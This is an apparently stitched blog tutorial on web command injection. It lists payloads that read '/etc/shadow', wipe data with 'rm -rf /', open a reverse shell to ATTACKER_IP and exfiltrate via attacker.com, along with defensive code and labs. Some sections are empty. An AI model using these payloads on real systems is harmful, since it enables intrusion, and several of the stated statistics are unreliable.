
Hey guys, Rocky here! 💻💥
Welcome to Day 10 of the Daily Web Hacking series! We’ve covered directory traversal, authentication bypasses, and file upload vulns. Today, we’re diving into Part 10: Command Injection—the hack that turns innocent web apps into puppets that execute your malicious commands on the server. Imagine whispering into a server’s ear and making it dance to your tune. Let’s break it down!
—
What is Command Injection?
Command Injection is a vulnerability that allows attackers to execute arbitrary operating system (OS) commands on a server by exploiting insecure input handling in web apps. By injecting commands like `; rm -rf /` or `| cat /etc/passwd`, hackers can:
- Steal sensitive data (passwords, databases).
- Install malware (ransomware, backdoors).
- Take full control of the server.
Why it’s terrifying:
- Ranked #1 in the OWASP Top 10 (Injection, 2021).
- Found in 23% of web apps (Snyk, 2023).
- Often leads to catastrophic breaches (e.g., Equifax).
—
How Command Injection Works
Web apps sometimes pass user input directly to OS commands. If the input isn’t sanitized, attackers can trick the app into running unintended commands.
Example:
A site lets users ping an IP address:
import os

def ping(request):
    ip = request.GET.get('ip')        # untrusted query parameter, used as-is
    os.system(f"ping -c 4 {ip}")      # Vulnerable code! The shell parses ; | & $( ) inside ip
An attacker submits `8.8.8.8; cat /etc/passwd`, so the shell receives:
ping -c 4 8.8.8.8; cat /etc/passwd # Both commands run!
Result: The server pings Google’s DNS and then leaks its user account file (/etc/passwd).
—
Types of Command Injection
1. OS Command Injection
What: Directly execute OS commands (e.g., `ls`, `rm`, `curl`).
Payloads:
; whoami # Unix
& dir C:\ # Windows
| cat /etc/shadow # Pipe output
2. Blind Command Injection
What: No direct output, but infer results via delays or side effects.
Payloads:
; sleep 10 # If the response takes 10 seconds, it worked.
|| ping -c 10 attacker.com # Exfiltrate data via network calls.
3. Out-of-Band (OOB) Injection
4. Time-Based Injection
What: Use command execution time to infer success.
Payload:
; if [ $(id -u) -eq 0 ]; then sleep 10; fi # If root, delay response.
—
Command Injection Attack Vectors
1. Web Forms
Example: IP lookup, contact forms, file uploads.
Payload:
8.8.8.8; nc -e /bin/bash ATTACKER_IP 4444 # Reverse shell
2. HTTP Headers
3. File Uploads
4. API Parameters
—
Real-World Command Injection Disasters
- Equifax (2017): Exploited Apache Struts vulnerability to execute commands, leaking 147M records.
- Drupalgeddon (2014): Command injection in Drupal led to mass site takeovers.
- Pharma Giant (2020): Hackers used command injection to deploy ransomware.
Lesson: One line of code can cost millions.
—
Step-by-Step Exploitation
Goal: Gain a reverse shell on a vulnerable server.
1. Find a Vulnerable Input
- Look for inputs tied to OS functions (e.g., ping, file uploads).
- Example URL:
https://hacklivly.com/ping?ip=8.8.8.8
2. Test for Injection
- Submit `8.8.8.8; whoami`.
- If the response includes the server’s user (e.g., `www-data`), it’s vulnerable.
3. Launch a Reverse Shell
4. Escalate Privileges
—
Advanced Command Injection Techniques
1. Chaining Commands
2. Environment Variable Abuse
3. Encoding Payloads
4. Blind Data Exfiltration
—
Tools for Command Injection
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force command arguments.
2. Commix
3. Metasploit
- Use modules like `exploit/multi/http/struts_code_exec` for known vulns.
4. OWASP ZAP
- Automated scanning for injection flaws.
—
Defending Against Command Injection
For Developers
Avoid OS Commands
Prefer library functions over shelling out. If a command is unavoidable, pass an argument list and never build a shell string from user input.
Bad:
os.system(f"ping {ip}")   # the shell parses the whole string, metacharacters included
Good:
subprocess.run(["ping", "-c", "4", ip], shell=False)   # ip is one argument, no shell involved
Input Validation
Whitelist allowed characters (e.g., only numbers and dots for IPs).
Python Example:
import re
if not re.match(r"^\d+\.\d+\.\d+\.\d+$", ip):   # stricter: ipaddress.ip_address(ip) also rejects 999.1.1.1
    raise ValueError("Invalid IP!")
Use Parameterized APIs
Safe Libraries (escaping for the rare case a shell string is unavoidable; an argument list with shell=False is still the safer option):
- Python: `shlex.quote()`.
- PHP: `escapeshellarg()`.
Least Privilege Principle
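As an added example (my code, not from the post), here is the post's vulnerable ping handler next to a hardened version that combines the developer advice above: allow-list validation with the standard library's ipaddress module (stricter than the regex) plus an argument list with shell=False. The function names, the dry_run flag and the sample inputs are my assumptions.

```python
import ipaddress
import os
import subprocess


def ping_vulnerable(ip: str) -> int:
    """The post's vulnerable pattern: untrusted input is spliced into a shell
    string, so '8.8.8.8; cat /etc/passwd' becomes two commands."""
    return os.system(f"ping -c 4 {ip}")  # DO NOT USE: ; | & $( ) are interpreted


def validate_ip(value: str) -> str:
    """Allow-list check: only a syntactically valid IPv4/IPv6 literal passes.
    ipaddress is stricter than the post's regex (it rejects 999.1.1.1 too)."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"Invalid IP: {value!r}") from None


def ping_safe(ip: str, dry_run: bool = False) -> list[str]:
    """Hardened version: validated input, argv list, shell=False.
    Returns the argv so callers (and tests) can inspect what would run."""
    argv = ["ping", "-c", "4", validate_ip(ip)]
    if not dry_run:
        # No shell is involved, so metacharacters in ip would be plain bytes of
        # the target argument (and validate_ip has already rejected them).
        subprocess.run(argv, shell=False, check=False, timeout=30)
    return argv


def demo() -> dict[str, object]:
    """Constructed inputs: a benign IPv4, an IPv6, and the post's payload."""
    results: dict[str, object] = {}
    for candidate in ("8.8.8.8", "2001:4860:4860::8888", "8.8.8.8; cat /etc/passwd"):
        try:
            results[candidate] = ping_safe(candidate, dry_run=True)
        except ValueError as exc:
            results[candidate] = str(exc)
    return results


if __name__ == "__main__":
    for inp, out in demo().items():
        print(f"{inp!r:35} -> {out}")
```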
For Admins
Web Application Firewall (WAF)
- Block requests with `;`, `&`, `|`, or `$( )`.
Log Monitoring
Patch Management
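For the log monitoring point, an added example (my code, not from the post) that scans constructed access-log lines for the metacharacters listed above, peels an extra percent-encoding layer, and rates a hit higher when a command name such as whoami or sleep rides along. The log lines, the field names and the severity labels are my assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format; not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /ping?ip=8.8.8.8 HTTP/1.1" 200 512
203.0.113.5 - - [10/May/2024:12:00:09 +0000] "GET /ping?ip=8.8.8.8%3B%20whoami HTTP/1.1" 200 530
203.0.113.5 - - [10/May/2024:12:00:30 +0000] "GET /ping?ip=8.8.8.8%253Bsleep%252010 HTTP/1.1" 200 512
198.51.100.7 - - [10/May/2024:12:01:00 +0000] "GET /search?q=cats+%26+dogs HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Separators and substitutions that let a second command ride along (the characters the post tells admins to block).
META_RE = re.compile(r"[;&|`]|\$\(|\$\{")
# Command names that turn a stray metacharacter into a likely probe; whole words, matched after decoding.
PROBE_RE = re.compile(r"\b(whoami|sleep|id|cat|nc|curl|wget|bash|sh)\b")


def analyze_line(line: str) -> list[dict]:
    """Return one finding per query parameter whose decoded value carries shell metacharacters."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = unquote(raw)  # parse_qsl decoded one layer; peel a second so %253B (-> %3B -> ;) is caught
        meta = META_RE.findall(value)
        if not meta:
            continue
        probes = PROBE_RE.findall(value)
        findings.append({
            "src": m["src"], "ts": m["ts"], "param": name, "value": value,
            "meta": meta, "probes": probes,
            # A bare metacharacter is noisy (search boxes, '&' in prose); with a command name it is a probe.
            "severity": "high" if probes else "medium",
        })
    return findings


def scan_log(text: str) -> list[dict]:
    """Run analyze_line over every non-empty line and flatten the findings."""
    return [f for line in text.splitlines() if line.strip() for f in analyze_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']:14} {f['param']}={f['value']!r} probes={f['probes']}")
```

The medium hit on the search query shows why a metacharacter alone is a weak signal; pair it with a command name, a non-existent parameter value pattern, or an unusually slow response (the time-based probes above) before alerting.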
—
Practice Legally: Labs & Challenges
- OWASP Juice Shop:
- Practice command injection in the Admin Panel challenge.
- PortSwigger Labs:
- Hack The Box:
- Machines like Lame (Metasploit) and Node (Node.js RCE).
—
Ethical Hacking & Reporting
Never exploit command injection without permission. If you find a flaw:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
What’s Next? Part 11: Server-Side Request Forgery (SSRF)
Tomorrow, we’ll explore SSRF—tricking servers into fetching internal resources. Sneak peek:
GET /proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
—
Final Thoughts
Command injection is the ultimate power move in hacking. A single unsanitized input can hand over the keys to the kingdom. But with secure coding practices, input validation, and a paranoid mindset, you can lock this vulnerability down.
Remember: Every command you don’t let attackers run is a breach you prevent. Stay sharp, stay ethical, and keep breaking things (responsibly)!
Rocky signing off! ✌️
—
P.S. If you’re loving this series, share it with your hacking squad! Let’s turn script kiddies into security heroes.
Discussion Question: What’s the wildest command you’ve ever executed via injection? I once used `curl` to download a Rickroll and set it as the server’s MOTD. 😂 Drop your stories below! 👇